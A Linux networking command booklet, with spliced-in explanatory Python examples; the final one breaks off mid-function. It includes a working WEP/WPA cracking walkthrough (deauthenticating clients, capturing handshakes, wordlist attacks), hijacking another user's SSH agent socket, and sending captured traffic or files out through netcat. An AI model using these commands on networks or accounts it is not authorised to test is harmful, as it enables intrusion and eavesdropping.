&& The Linux Network Book
-------------------------

A booklet about networking using the linux operating system.

== tools
.. mtr - a traceroute ping program
.. traceroute -
.. ping -
.. ifconfig -
..

WIRELESS NETWORKING

* show all network 'interfaces' including wireless ones
>> ifconfig -a

* show all wireless network interfaces (devices) on the computer
>> iwconfig

* monitor the wifi connection with the watch command (refresh every 3s)
>> watch -d -n 3 "iw dev wlan0 station dump; iwconfig wlan0"

* scan for available wireless networks using the 'ra0' (ralink) device
>> iwlist ra0 scan

* list lots of info about available wireless nets from the 'eth1' device
>> iwlist eth1 scan | less

* list the transmit power information for the 'eth1' wireless interface
>> iwlist eth1 txpower

CONNECTING TO A WIRELESS NETWORK

* connect to a wep access point
>> iwconfig [interface] mode managed key [WEP key]
>> iwconfig [interface] essid "[ESSID]"
(specify the ESSID of the WLAN; 128 bit WEP uses 26 hex characters, 64 bit WEP uses 10)

* request IP address, netmask, DNS server and default gateway from the access point
>> dhclient [interface]

* test if the connection worked
>> ping www.bbc.co.uk
(if you receive a reply you have access)

WIRELESS NETWORK SECURITY AUDITING ....

The process of attempting to obtain the password for a wireless network
may be referred to as a 'security audit' of the network, or more
commonly as 'hacking' or 'wardriving'.

http://ubuntuforums.org/showthread.php?t=528276
a step by step guide

* find the BSSID (mac address) and channel number of the target
>> iwlist ra0 scan

* find the ESSID and channel number
>> iwlist ra0 scan | grep 'Address\|IE\|SSID\|Frequency'

* use kismet to scan for available 802.11 wireless networks
>> sudo kismet

Kismet may be a little tricky to configure. What is more, kismet relies
upon 'wireshark' (formerly known as 'ethereal') which itself has been
known to have security problems.
* start collecting packets from the target access point
>> sudo airodump-ng -c 1 --bssid 00:24:01:57:2C:43 -w output ra0

== options explained
.. -c 1 - the channel of the target access point
.. --bssid - the mac address or bssid of the target access point
.. ra0 - your wireless interface (eg wlan0)
.. output - a filename prefix for saving the captured packets
..

Using 'injection' can speed up the process of collecting packets, and
therefore of recovering the wifi password. However in many cases it may
be possible to recover the password without using injection.

* start attempting to recover the password using captured packets
>> aircrack-ng -b 00:24:01:57:2C:43 output*.cap

== options
.. -b 00:24:etc:43 - the mac address (or bssid) of the target access point
.. output*.cap - the set of files where captured packets are stored
..

== other tools
.. pycracker
.. wesside -
..

WPA WIRELESS AUDITING

http://www.aircrack-ng.org/doku.php?id=cracking_wpa
a guide to wpa wifi auditing
http://en.wikipedia.org/wiki/Wi-Fi_Protected_Access
the wikipedia page on wpa

* show wireless interfaces and devices and chipset
>> sudo airmon-ng

* disable the 'ath0' wireless interface (device)
>> airmon-ng stop ath0

try the following

>> sudo airmon-ng start wlan0
this will start a monitor interface called mon0 etc
>> sudo airodump-ng -w data mon0
collect packets and hopefully handshakes and data from all access points, networks etc

Once you've got a handshake (see message below) do
>> sudo aircrack-ng -w dict.txt data*.cap
where dict.txt is a set of words, one of which is hopefully the password
for the access point.

The basic technique for wpa wireless auditing is ...

- capture the 'handshake' between a station and the wireless access point
  it connects to. This involves either deauthenticating a client or else
  just waiting until you see
>> [ WPA handshake: 00:14:6C:7E:40:80
  in the top right corner of the airodump screen.
In other words, you just have to wait for someone to log onto their wifi
wpa access point.

- Try to crack the psk with a dictionary file and brute force. This may
  take a while and depends on how good your dict file is.

* find the access point you're going to have a go at with wifi device 'ra0'
>> sudo iwlist ra0 scan | less

* put the interface into monitor mode
>> sudo airmon-ng start wlan0
A new monitor interface such as 'mon0' will be created. Use this with
aircrack-ng to try to grab a handshake.

* try to get the authentication handshake. Write data to files 'try...'
>> airodump-ng -c 9 --bssid D8:5D:4C:AD:29:E9 -w try ra0
or
>> airodump-ng -c 9 --bssid D8:5D:4C:AD:29:E9 -w try mon0
Substitute in the bssid and channel (-c) you got from iwlist

* try to 'deauthenticate' a client (-c) for access point (-a)
>> aireplay-ng -0 1 -a D8:5D:4C:AD:29:E9 -c 00:0F:B5:FD:FB:C2 ath0
This basically tries to close someone's wifi connection so that they will
log on again, and when they do, you can capture their authentication packets.

== options explained
.. -0 - means deauthentication
.. 1 - the number of deauths to send (you can send multiple if you wish)
.. -a 00:14:6C:7E:40:80 - the MAC address of the access point
.. -c 00:0F:B5:FD:FB:C2 - the MAC address of the client you are deauthing
.. ath0 - the interface name
..

CANT START AIRODUMP

Here is another suggestion when airodump returns the following error
"ioctl(SIOCSIFFLAGS) failed: Name not unique on network"
This worked!!

First, take the wireless interface down:
>> sudo ifconfig wlan0 down
Then, change your wireless card to monitor mode:
>> sudo iwconfig wlan0 mode monitor
Next, bring your wireless interface up:
>> sudo ifconfig wlan0 up
Then, you can run airodump-ng:
>> sudo airodump-ng wlan0

RECOVER WPA PASSWORD ....

Once the handshake has been obtained, the task is now 'offline'. No
wireless connection is necessary to proceed.
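Why the recovery step is offline, and why the wordlist filters further on insist on 8 to 63 printable characters: WPA/WPA2-Personal turns the passphrase and the SSID into the 256-bit Pairwise Master Key with PBKDF2-HMAC-SHA1 at 4096 iterations (IEEE 802.11i), and the captured handshake only lets a tester check whether a guessed PMK is the right one. The following added example (not part of the booklet, and not aircrack-ng's code) computes that derivation, applies the passphrase rules to a constructed wordlist, and estimates the per-guess cost on the current machine; the function names are mine, and the only outside value is the standard's own test vector (passphrase "password", SSID "IEEE"), which is also what `wpa_passphrase IEEE password` prints.

```python
# Added example: WPA passphrase rules and PMK derivation (IEEE 802.11i).
# Not the booklet's code; function names are the editor's choice.
from __future__ import annotations
import hashlib
import time

PBKDF2_ITERATIONS = 4096   # fixed by the standard
PMK_LEN = 32               # 256-bit Pairwise Master Key


def passphrase_is_valid(passphrase: str) -> bool:
    """802.11i rules: 8-63 characters, each with ASCII code 32..126."""
    if not 8 <= len(passphrase) <= 63:
        return False
    return all(32 <= ord(c) <= 126 for c in passphrase)


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    if not passphrase_is_valid(passphrase):
        raise ValueError("passphrase violates the 8-63 printable-ASCII rule")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LEN)


def filter_wordlist(words: list[str]) -> list[str]:
    """Keep only candidates that could be a WPA passphrase at all; this is
    what the sed/grep one-liners in the WORDLISTS section do."""
    return [w for w in words if passphrase_is_valid(w)]


def guesses_per_second(ssid: str = "IEEE", samples: int = 20) -> float:
    """Rough single-core cost of one candidate: every guess costs a full
    PBKDF2 run, which is why a long random passphrase is out of reach."""
    start = time.perf_counter()
    for i in range(samples):
        derive_pmk(f"sample-pass-{i:04d}", ssid)   # constructed candidates
    elapsed = max(time.perf_counter() - start, 1e-9)
    return samples / elapsed


if __name__ == "__main__":
    # Test vector from the standard: passphrase "password", SSID "IEEE".
    print(derive_pmk("password", "IEEE").hex())
    # Constructed sample wordlist: too short, fine, non-ASCII, too long.
    print(filter_wordlist(["short", "Correct Horse 42", "caf\u00e9latte!", "x" * 64]))
    print(f"about {guesses_per_second():.0f} guesses/s on this machine")
```

The test vector pins the implementation: if the hex does not match, the encoding or iteration count is wrong, and so would be any wordlist check built on it. On the defensive side the same number tells you the budget: at a few thousand guesses per second per core, a passphrase drawn from a dictionary falls quickly, while 12 or more random printable characters do not.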
* use a word-list file to try to recover the wpa password
>> aircrack-ng -w password.lst -b D8:5D:4C:AD:29:E9 try*.cap

* or have a go with any network
>> sudo aircrack-ng -w dict.txt data*.cap
and a list of possible networks will be presented.

Problems:
---------

aircrack-ng says "got no data packets from target network" or
"No valid WPA handshakes found...": go back to the previous step and
wait until you see the handshake message.

If aircrack-ng produces the message 'No valid WPA handshakes found...'
then you need to go back a step and capture the authentication handshake
as described above.

* use the 'john' password auditor to feed passwords to aircrack

* delete the capture files if no handshakes have been found
>> (aircrack-ng -w /usr/share/john/password.lst -b 00:24:17:D1:81:C6 ash*.cap | grep 'No valid WPA handshakes found') && rm -f ash*

WORDLISTS WITH WPA...

Each character in the pass-phrase must have an encoding in the range of
32 to 126 (decimal). To audit or recover a wireless wpa password you need
to use a 'dictionary' or wordlist file with the aircrack-ng program.
Aircrack-ng tests each password found in the wordlist file against the
'handshake' data captured from a wpa wireless authentication. You may
need to create or adapt a wordlist to your particular needs in order to
speed up the checking process.

* obtain a large wordlist with words in several languages
>> http://ftp.sunet.se/pub/security/tools/net/Openwall/wordlists/all.gz

* remove wpa passwords that are too long or too short from 'dict.lst'
>> sed -n '/^.\{8,63\}$/p' dict.lst > new.lst
wpa passwords must be between 8 and 63 characters

* try cracking the key with a 600K word linux wordlist
>> aircrack-ng -w /usr/share/dict/british-english-insane -b D8:5D:4C:AD:29:E9 try*.cap

* delete all characters which are not letters, digits or the newline
>> tr -cd '[:alnum:]\n' < dict.txt > newdict.txt

* try to create a wordlist from the content of a webpage (incomplete...)
>> lynx -dump http://bumble.sf.net/ | tr -cd '[:alpha:] \n' | tr -s " " | tr ' ' '\n' | less

* pipe a bash generated password list to aircrack-ng
>> echo ruby{1000..2000} | tr ' ' '\n' | aircrack-ng -w - -b D8:5D:4C:AD:29:E9 try*.cap

* remove all punctuation/spaces from 's.lst', uppercase, pipe to aircrack
>> tr -dc '[:alnum:]\n' < s.lst | sed 's/.*/\U&/' | aircrack-ng -w - -b D8:5D:4C:AD:29:E9 try*.cap

* permute (inflate) dict file 'p.lst', with uppercase and suffixes 0,1,2
>> sed 's/.*/&\n\U&\n&0\n&1\n&2/' p.lst

* reduplicate short lines and add 0,1,2 to all, and uppercase
>> sed '/^.\{4,6\}$/s//&&/;s/.*/&\n&0\n&1\n&2\n\U&/' < dict.txt

* get rid of punctuation, reduplicate short lines, add numbers, uppercase
>> tr -dc '[:alnum:]\n' < dict.txt | sed '/^.\{4,6\}$/s//&&/;s/.*/&\n&0\n&1\n&2\n\U&/'

* use john's word mangling rules to expand a wordlist and pipe it to aircrack
>> john --stdout --wordlist=specialrules.lst --rules | aircrack-ng -e test -a 2 -w - /root/capture/wpa.cap

* ensure all passwords are between 8 and 63 characters
>> grep -E '^.{8,63}$' < inputfile

* use the small password file in the sources of aircrack
>> .. /aircrack-ng-1.2-beta2/test/password.lst

WORDNET

wordnet is a big database of english synonyms and other parts of speech.
It may be a useful tool for creating wordlists which can be used to guess
('brute force') WPA wifi passwords. By combining adjectives with nouns,
an interesting password list might be created.

* create a large list of english adjectives for aircrack
-------
echo "wn "{a..z}" -grepa;" | bash | sort | uniq > adj.lst
aircrack-ng -w adj.lst --bssid aa:bb:etc data*.cap
,,,

* try to create a very large list of english nouns
-------
echo "wn "{a..z}{a..z}" -grepn;" | bash | sort | uniq > noun.lst
aircrack-ng -w noun.lst --bssid aa:bb:etc data*.cap
,,,

The code above uses the bash 'expansion' feature to create a long series
of 'wn nn -grepn' commands.
On my system this creates a wordlist of 118204 nouns and requires about
30 seconds to execute.

IP ADDRESSES

An ip address is a unique number which identifies each computer (or
really each interface of a computer) on a network.

* get info about remote host ports and os detection
>> nmap -sS -P0 -sV -O [host]

* list all ip addresses for this computer
>> ifconfig | awk '/inet / {print $2}'

* get your internal ip address and nothing but your internal ip
>> ifconfig $devices | grep "inet addr" | sed 's/.*inet addr:\([0-9\.]*\).*/\1/g'

* send the internal IP address by email
>> ifconfig en1 | awk '/inet / {print $2}' | mail -s "hello world" email@email.com

BANDWIDTH

Bandwidth is the amount of data transferred per second (or other time unit).

* monitor bandwidth by pid
>> nethogs -p eth0

* quick key/value display within /proc or /sys
>> grep -r . /sys/class/net/eth0/statistics

* delete all aliases for a network interface on a (Free)BSD system
>> ifconfig | grep "0xffffffff" | awk '{ print $2 }' | xargs -n 1 ifconfig em0 delete

* using netcat to copy files between servers
>> on target: nc -l 4000 | tar xvf -
>> on source: tar -cf - . | nc target_ip 4000

ROUTERS

* backup your OpenWRT config (only the config)
>> curl -d 'username=root&password=your-good-password' "http://router/cgi-bin/luci/admin/system/backup?backup=kthxbye" > `date +%Y%d%m`_config_backup.tgz

WIRED ETHERNET

* check if the network cable is plugged in and working correctly
>> mii-tool eth0

SSH

Ssh is a more secure replacement for telnet.

* a function for hostname tab-completion with ssh
---------------------------------
autoCompleteHostname() {
  local hosts
  local cur
  # take the host field of known_hosts, dropping any ",ip" suffix
  hosts=($(awk '{print $1}' ~/.ssh/known_hosts | cut -d, -f1))
  cur=${COMP_WORDS[COMP_CWORD]}
  COMPREPLY=($(compgen -W '${hosts[@]}' -- $cur))
}
complete -F autoCompleteHostname ssh
,,,

* ssh autocomplete
>> complete -W "$(echo $(grep '^ssh ' .bash_history | sort -u | sed 's/^ssh //'))" ssh

SSHFS ....
* mount an ssh (remote) file system
>> sshfs name@server:/path/to/folder /path/to/mount/point

* unmount an ssh file system
>> fusermount -u ~/sshfs_mounted_directory

TCP PORTS

A port is a concept within tcp (the transmission control protocol) which
allows a machine to make multiple 'socket' connections through a single
network interface.

* list open tcp/ip ports on the local computer and program name
>> netstat -tl
>> netstat -tupl

* list open tcp/ip ports on the local computer and port number
>> netstat -tlnp

* show some port info
>> lsof -i

* find listening ports by pid
>> lsof -nP +p 24073 | grep -i listen | awk '{print $1,$2,$7,$8,$9}'

NETCAT

Netcat or just 'nc' is considered to be a highly useful network tool for
copying data to and from network connections. I don't get it really.

* tar a directory and send it to netcat
>> tar cfvz - /home/user | netcat -l -p 10000

PINGING

Ping can be used to tell if a particular host is 'alive' on the network.

* use ping
>> ping 192.168.1.1

* ping a URL sending output to file and STDOUT
>> ping google.com | tee ping-output.txt

* perform a ping sweep of all computers in an ip range
>> nmap -sP 192.168.1.*

* use a 'tcp' ping (tcp ACK packet) to see if a host is responding
>> nmap -PT 192.168.1.1
(-PT is the old nmap spelling; current versions call the ACK ping -PA)

* use a tcp ping on port 6000 to see if a host is responding
>> nmap -PT6000 192.168.1.1

Configure a 'stateful' firewall to stop these attacks.

SCANNING TCP PORTS

It is possible to query all the available tcp ports on the local or a
remote computer in order to find out which ports are 'listening' (waiting
for a connection).

* use tcp-connect to scan common ports on a host for tcp services
>> nmap -sT 10.0.0.1
This is not a 'stealthy' technique since the host will probably log these attempts.
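The netstat and lsof commands in the TCP PORTS section, and a scan of your own host, both answer the same question: which sockets is this machine listening on? As an added example (not part of the booklet, and not netstat's code), the following decodes /proc/net/tcp, the file netstat and ss read, and lists the LISTEN sockets with their bind address and owner uid, so you can see which services are reachable from the network rather than only on loopback. The function names and the sample table are mine; the sample is constructed in the kernel's format (little-endian hex IPv4 address, big-endian hex port, state 0A = LISTEN).

```python
# Added example: decode /proc/net/tcp and inventory listening sockets.
# Not the booklet's code; the sample table below is constructed.
from __future__ import annotations
import socket
import struct
from pathlib import Path

TCP_STATES = {0x01: "ESTABLISHED", 0x02: "SYN_SENT", 0x03: "SYN_RECV",
              0x04: "FIN_WAIT1", 0x05: "FIN_WAIT2", 0x06: "TIME_WAIT",
              0x07: "CLOSE", 0x08: "CLOSE_WAIT", 0x09: "LAST_ACK",
              0x0A: "LISTEN", 0x0B: "CLOSING"}


def decode_addr(hex_addr: str) -> tuple[str, int]:
    """'0100007F:0016' -> ('127.0.0.1', 22). The kernel prints the IPv4
    address as a little-endian 32-bit hex word and the port as big-endian."""
    ip_hex, port_hex = hex_addr.split(":")
    ip = socket.inet_ntoa(struct.pack("<L", int(ip_hex, 16)))
    return ip, int(port_hex, 16)


def parse_proc_net_tcp(text: str) -> list[dict]:
    """One dict per socket row; the first line of the file is the header."""
    rows = []
    for line in text.splitlines()[1:]:
        f = line.split()
        if len(f) < 10:
            continue
        lip, lport = decode_addr(f[1])
        rip, rport = decode_addr(f[2])
        rows.append({"local": (lip, lport), "remote": (rip, rport),
                     "state": TCP_STATES.get(int(f[3], 16), f[3]),
                     "uid": int(f[7]), "inode": int(f[9])})
    return rows


def listening_ports(text: str) -> list[tuple[str, int, int]]:
    """(bind address, port, uid) for every LISTEN socket, sorted."""
    return sorted((r["local"][0], r["local"][1], r["uid"])
                  for r in parse_proc_net_tcp(text) if r["state"] == "LISTEN")


def exposed_on_all_interfaces(text: str) -> list[int]:
    """Ports bound to 0.0.0.0: reachable from the network, not just loopback."""
    return [port for addr, port, _ in listening_ports(text) if addr == "0.0.0.0"]


# Constructed sample: sshd on all interfaces, a database on loopback only
# (uid 999), and one established ssh session from 10.0.2.1.
SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 18227 1 0000000000000000 100 0 0 10 0
   1: 0100007F:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000   999        0 19880 1 0000000000000000 100 0 0 10 0
   2: 0F02000A:0016 0102000A:D2A4 01 00000000:00000000 00:00000000 00000000     0        0 21533 1 0000000000000000 20 4 30 10 -1
"""

if __name__ == "__main__":
    proc = Path("/proc/net/tcp")
    text = proc.read_text() if proc.exists() else SAMPLE
    for addr, port, uid in listening_ports(text):
        print(f"LISTEN {addr}:{port} uid={uid}")
    print("reachable from the network:", exposed_on_all_interfaces(text))
```

Run it on a live Linux host and the output is the same list `netstat -tlnp` gives (without the program names, which need /proc/*/fd to map the inode to a pid); run it on the constructed sample and only port 22 shows up as exposed, because 3306 is bound to 127.0.0.1. The IPv6 table, /proc/net/tcp6, has the same layout with 128-bit addresses.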
* use nmap to scan all possible ports on a host for tcp services
>> nmap -sT 10.0.0.1 -p 1-65535

* use a 'SYN' scan to scan common ports on a host for tcp services
>> nmap -sS 10.0.0.1

* use a 'SYN' scan to scan for open tcp ports on the local computer
>> sudo nmap -sS 127.0.0.1

* perform a 'FIN' scan of the tcp ports of a host
>> nmap -sF 192.168.1.100
FIN is normally used to end or tear down a tcp/ip connection

* perform a scan of the tcp ports of a host by sending a "NULL" packet
>> nmap -sN 192.168.1.100

IP PROTOCOL

* see which ip protocols (icmp, tcp, udp etc) a host supports
>> sudo nmap -sO 192.168.1.1

* see what ip protocols are running on the local computer
>> sudo nmap -sO 127.0.0.1

TCP SERVICES

* use amap to find out what type of service a port is running
>> amap [host] [port]

* show port numbers for common tcp/ip services
>> less /etc/services

WEB SERVERS

This section is not an in depth treatment of the large topic of web
servers but only some cursory notes relating to security and trouble
shooting. A web server is a potential security hazard, as are all
listening tcp services.
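The log checks in this section (`less access.log`, `zcat` of the rotated logs, `grep -v 127.0.0.1`) are easier to act on once the lines are parsed. The following added example (not part of the booklet, not Apache's code) parses access.log lines in the combined format, drops your own loopback traffic the way the grep does, and reports per client address how many requests ended in 404: a client asking for many different non-existent paths is the usual signature of a scanner probing the server. Function names, thresholds and the sample log lines are mine; the lines are constructed, with documentation-range addresses.

```python
# Added example: triage Apache access.log lines for probing clients.
# Not the booklet's code; the sample log below is constructed.
from __future__ import annotations
import re
from collections import defaultdict

# Apache "combined" format: ip ident user [time] "req" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)')


def parse_line(line: str) -> dict | None:
    """Return the fields of one log line, or None for a malformed line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def summarise(lines, ignore=("127.0.0.1",)) -> dict:
    """Per client IP: request count, 404 count and the distinct 404 paths.
    Addresses in `ignore` are skipped, like the grep -v '127.0.0.1' above."""
    stats = defaultdict(lambda: {"requests": 0, "not_found": 0, "paths_404": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["ip"] in ignore:
            continue
        s = stats[rec["ip"]]
        s["requests"] += 1
        if rec["status"] == 404:
            s["not_found"] += 1
            s["paths_404"].add(rec["path"])
    return dict(stats)


def suspicious_clients(lines, min_404: int = 3, min_ratio: float = 0.5) -> list[str]:
    """Clients whose 404s are both numerous and a large share of their traffic.
    A browser following a broken link gives one 404; a scanner gives dozens."""
    out = []
    for ip, s in summarise(lines).items():
        if s["not_found"] >= min_404 and s["not_found"] / s["requests"] >= min_ratio:
            out.append(ip)
    return sorted(out)


# Constructed sample: one ordinary visitor, one client guessing paths,
# and the admin's own loopback request that must be ignored.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /style.css HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Oct/2023:13:56:01 +0000] "GET /admin/ HTTP/1.1" 404 489 "-" "curl/7.68.0"
198.51.100.23 - - [10/Oct/2023:13:56:01 +0000] "GET /backup.zip HTTP/1.1" 404 489 "-" "curl/7.68.0"
198.51.100.23 - - [10/Oct/2023:13:56:02 +0000] "GET /old/ HTTP/1.1" 404 489 "-" "curl/7.68.0"
198.51.100.23 - - [10/Oct/2023:13:56:02 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "curl/7.68.0"
127.0.0.1 - - [10/Oct/2023:13:57:00 +0000] "GET /missing HTTP/1.1" 404 489 "-" "Wget/1.20"
"""

if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for ip, s in summarise(lines).items():
        print(f"{ip}: {s['requests']} requests, {s['not_found']} x 404")
    print("suspicious:", suspicious_clients(lines))
```

To run it over the real logs, feed it `zcat -f /var/log/apache2/access.log*` line by line; the thresholds are deliberately conservative, and the set of 404 paths per client is kept so that the analyst can look at what was being probed before deciding on a block.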
* check whether the apache webserver is currently running
>> sudo service apache2 status

* restart the apache server
>> sudo apache2ctl restart

* stop apache from automatically starting at boot time (ubuntu)
>> sudo chkconfig apache2 off

* show all loaded apache modules
>> apache2ctl -M

For the sake of security it's a good idea to check your log files to see
how people are trying to break into your computer via the webserver.

* view the latest apache access log
>> less /var/log/apache2/access.log

* check all the apache log files, but not necessarily in the right order
>> zcat -f /var/log/apache2/access.log.* | less

* check all apache log files except your own activities
>> zcat -f /var/log/apache2/access.log.* | grep -v '127.0.0.1' | less

* see who is using tcp port 80
>> watch lsof -i :80
>> lsof -i :80

TELNET

* scan for open ports using telnet
>> HOST=127.0.0.1; for ((port=1; port<=65535; ++port)); do echo -en "$port "; if echo -en "open $HOST $port\nlogout\nquit" | telnet 2>/dev/null | grep 'Connected to' > /dev/null; then echo -en "\n\nport $port/tcp is open\n\n"; fi; done | grep open

MISCELLANEOUS

* how to establish a remote Gnu screen session
>> ssh -t user@some.domain.com /usr/bin/screen -xRR

* check a server is up. If it isn't mail me.
>> ping -q -c1 -w3 brandx.jp.sme > /dev/null 2>&1 || echo brandx.jp.sme ping failed | mail -ne -s 'Server unavailable' joker@jp.co.uk

* copy specific files to another machine, keeping the file
>> tar cpfP - $(find -type f -name '*.png') | ssh user@host 'tar xpfP -'

* graph # of connections for each host
>> netstat -an | grep ESTABLISHED | awk '{print $5}' | awk -F: '{print $1}' | sort | uniq -c | awk '{ printf("%s\t%s\t",$2,$1); for (i = 0; i < $1; i++) {printf("*")}; print "" }'

* how to run a command on a list of remote servers read from a file
>> while read server; do ssh -n user@$server "command"; done < servers.txt

* find all active IP addresses in a network
>> nmap -sP 192.168.0.*

* connect via ssh using a mac address
>> ssh root@`for ((i=100; i<=110; i++)); do arp -a 192.168.1.$i; done | grep [mac address] | awk '{print $2}' | sed -e 's/(//' -e 's/)//'`

* autossh + ssh + screen = super rad perma-sessions
>> AUTOSSH_POLL=1 autossh -M 21010 hostname -t 'screen -Dr'

* determine if a tcp port is open
>> nc -zw2 www.example.com 80 && echo open

* block an IP address from connecting to a server
>> iptables -A INPUT -s 222.35.138.25/32 -j DROP

* create an SSH SOCKS proxy server on localhost:8000 that will
>> autossh -f -M 20000 -D 8000 somehost -N

* measure download speed on eth0
>> while true; do X=$Y; sleep 1; Y=$(ifconfig eth0 | grep 'RX bytes' | awk '{ print $2 }' | cut -d : -f 2); echo "$(( Y-X )) bps"; done

* show which programs are listening on TCP and UDP ports
>> netstat -plunt

* resume an aborted scp file transfer
>> rsync --partial --progress --rsh=ssh SOURCE DESTINATION

* get all the data about your IP configuration across all network interfaces (Windows)
>> ipconfig /all

* get the ip address of the interface used to reach the internet
>> python -c "import socket; s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM); s.connect(('google.com', 80)); print(s.getsockname()[0])"

* information about network connections
>> netstat -taupe

* get all IPs via ifconfig
>> ifconfig | grep "inet [[:alpha:]]\+" | cut -d: -f2 | cut -d' ' -f2

* see a list of listening ports
>> netstat -an | grep -i listen

* periodically loop a command
>> while true; do ifconfig eth0 | grep "inet addr:"; sleep 60; done

* graphical display of wireless links
>> wmwave

* see smbstatus all the time
>> while true; do smbstatus; sleep 5; clear; done

* number of open connections per ip
>> netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n

* snmpwalk a host's entire OID tree with SNMP v3
>> snmpwalk -v3 -On -u [user] -l NoAuthNoPriv -m ALL [host] .

* snmpwalk a host's entire OID tree with SNMP v3 with SHA
>> snmpwalk -v3 -On -u [user] -l AuthNoPriv -a SHA -A [passphrase] -m ALL [host] .

* create a proxy based on tsocks
>> alias tproxy='ssh -ND 8118 user@server & export LD_PRELOAD="/usr/lib/libtsocks.so"'

* ping a range of addresses
>> nmap -sP -T Insane 192.168.1.1-254

* connect to a remote machine with another encoding charset
>> LC_ALL=fr_FR luit ssh root@remote_machine_ip

* NICs, IPs, and MACs
>> ifconfig -a | nawk 'BEGIN {FS=" "}{RS="\n"}{ if($1~ /:/) {printf "%s ", $1}}{ if($1=="inet") {print " -- ",system("arp "$2)}}' | egrep -v "^[0-9]$"

* show what 'process id' (pid) is listening on port 80 on Linux
>> netstat -alnp | grep ::80

* simple way to invoke a secure vnc session through an ssh enabled host
>> vncviewer -via root@your.dyndns.com 192.168.1.1

* transfer an SSH public key to another machine in one step
>> ssh-keygen; ssh-copy-id user@host; ssh user@host

* live ssh network throughput test
>> yes | pv | ssh $host "cat > /dev/null"

* check open ports
>> lsof -Pni4 | grep LISTEN

* display current bandwidth statistics
>> ifstat -nt

* remotely sniff traffic and pass it to snort
>> sniff_host: tcpdump -nn -i eth1 -w - | nc 192.168.0.2 666

* proxy all web traffic via ssh
>> putty -D 8080 [server]

* multiple SSH tunnels
>> ssh -L [localport]:[host]:[port] -L [localport]:[host]:[port] [user]@[server]

* monitor opened TCP connections
>> watch -n 1 "netstat -tpanl | grep ESTABLISHED"

* sort dotted quads
>> sort -nt . -k 1,1 -k 2,2 -k 3,3 -k 4,4

* count IPv4 connections per IP
>> netstat -anp | grep 'tcp\|udp' | awk '{print $5}' | sed s/::ffff:// | cut -d: -f1 | sort | uniq -c | sort -n

* analyze traffic remotely over ssh with wireshark
>> ssh root@server.com 'tshark -f "port !22" -w -' | wireshark -k -i -

* backup the old files
>> find -type f -mtime +[days] -exec scp -r {} user@backuphost:/data/bkup \;

* use dig instead of nslookup
>> dig google.com

* get your external IP address
>> html2text http://checkip.dyndns.org | grep -i 'Current IP Address:' | cut -d: -f2

* connect to irssi over ssh
>> rxvt-unicode -g 999x999 -sr -depth 32 -bg rgba:0000/0000/0000/dddd +sb -T irssi -n irssi -name irssichat -e ssh server.com -Xt screen -aAdr -RR irssi irssi

* read just the IP address of a device
>> /sbin/ifconfig | grep inet | cut -f 2 -d ":" | cut -f 1 -d " " | egrep -v "^$"

* adhoc tar backup
>> tar -cvzf - /source/path | ssh -l [user] [host] dd of=/destination/path/backupfile.tgz

* list open sockets protocol/address/port/state/PID/program name
>> sudo netstat -punta

* the simplest way to transport information over a network
>> (on destination machine) nc -l 1234 > whatever
>> (on source machine) nc destination 1234 < whatever

* ride another SSH agent
>> export SSH_AUTH_SOCK=`find /tmp/ssh* -type s -user [user] -mtime -1 | head -1`

* validate an openssh key and print its md5 checksum
>> ssh-keygen -l -E md5 -f [pubkey] | awk '{print $2}' | sed 's/^MD5://' | tr -d ':' | egrep -i "[a-f0-9]{32}"
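Several of the one-liners above ("number of open connections per ip", "count IPv4 connections per IP", "block an IP address") form one small procedure: count established connections per remote address, spot the outliers, and feed them to an iptables DROP rule. As an added example (not part of the booklet, not netstat's or iptables' code) the following does the same over `netstat -an` output, with the two edge cases the shell versions trip over: the `::ffff:` prefix that IPv4 clients get on a dual-stack socket, and plain IPv6 addresses, where `cut -d: -f1` cuts in the wrong place but splitting on the last colon does not. The rules it produces are returned as text for review, never executed. Function names, the threshold and the sample netstat output are mine; the sample is constructed.

```python
# Added example: connections per remote address from `netstat -an` output.
# Not the booklet's code; SAMPLE below is constructed netstat output.
from __future__ import annotations
from collections import Counter


def split_host_port(endpoint: str) -> tuple[str, str]:
    """Split on the LAST colon, so IPv6 survives:
    '198.51.100.9:51234'         -> ('198.51.100.9', '51234')
    '::ffff:198.51.100.9:443'    -> ('198.51.100.9', '443')   (mapped IPv4)
    '2001:db8::1:443'            -> ('2001:db8::1', '443')"""
    host, _, port = endpoint.rpartition(":")
    if host.startswith("::ffff:"):
        host = host[len("::ffff:"):]
    return host, port


def connections_per_ip(netstat_output: str, state: str = "ESTABLISHED") -> Counter:
    """Count TCP rows in the given state by remote address
    (netstat -an rows: Proto Recv-Q Send-Q Local Foreign State)."""
    counts: Counter = Counter()
    for line in netstat_output.splitlines():
        f = line.split()
        if len(f) < 6 or not f[0].startswith("tcp") or f[5] != state:
            continue
        host, _ = split_host_port(f[4])
        counts[host] += 1
    return counts


def over_threshold(netstat_output: str, limit: int) -> list[tuple[str, int]]:
    """Remote addresses with more than `limit` established connections,
    busiest first."""
    hits = [(ip, n) for ip, n in connections_per_ip(netstat_output).items() if n > limit]
    return sorted(hits, key=lambda t: (-t[1], t[0]))


def drop_rules(netstat_output: str, limit: int) -> list[str]:
    """iptables commands for the outliers, as text for a human to review
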